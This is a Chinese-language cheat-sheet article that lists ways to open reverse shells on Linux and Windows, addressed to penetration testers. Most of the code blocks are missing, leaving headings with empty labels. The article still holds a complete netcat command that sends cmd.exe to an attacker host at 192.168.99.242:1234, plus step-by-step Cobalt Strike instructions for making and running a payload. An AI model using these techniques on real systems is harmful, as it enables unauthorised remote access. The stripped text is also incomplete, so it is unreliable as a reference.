反弹shell的几种姿势小结
在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。
反弹shell是打开内网通道的第一步,也是权限提升过程中至关重要的一步。所有姿势整理自网络,假设,攻击者主机为:192.168.99.242,本地监听1234端口,如有特殊情况以下会备注说明。
linux 反弹shell
姿势一:bash反弹
在线编码地址:
其他版本:
姿势二:nc反弹
姿势三:awk反弹
姿势四:telnet反弹
备注:需要在攻击主机上分别监听1234和4321端口,执行反弹shell命令后,在1234终端输入命令,4321查看命令执行后的结果。
姿势五:socat反弹
姿势六:python反弹
姿势七:php反弹
姿势八:perl反弹
姿势九:ruby反弹
姿势十:lua反弹
姿势十一:java反弹
保存为revs.java文件,编译执行,成功反弹shell。
windows反弹shell
姿势一:nc反弹
netcat 下载:
服务端反弹:nc 192.168.99.242 1234 -e c:\windows\system32\cmd.exe
姿势二:powershell反弹
powercat是netcat的powershell版本,功能免杀性都要比netcat好用的多。
下载到目标机器本地执行:
姿势三:msf反弹shell
使用msfvenom生成相关payload
姿势四:cobalt strike反弹shell
1、配置监听器:点击cobalt strike——>listeners——>在下方tab菜单listeners,点击add。
2、生成payload:点击attacks——>packages——>windows executable,保存文件位置。
3、目标机执行powershell payload
姿势五:empire反弹shell
姿势六:nishang反弹shell
reverse tcp shell:
reverse udp shell:
姿势七:dnscat反弹shell
github项目地址:
服务端:
目标主机:
到此这篇关于反弹shell的几种姿势小结的文章就介绍到这了,更多相关反弹shell内容请搜索以前的文章或继续浏览下面的相关文章希望大家以后多多支持!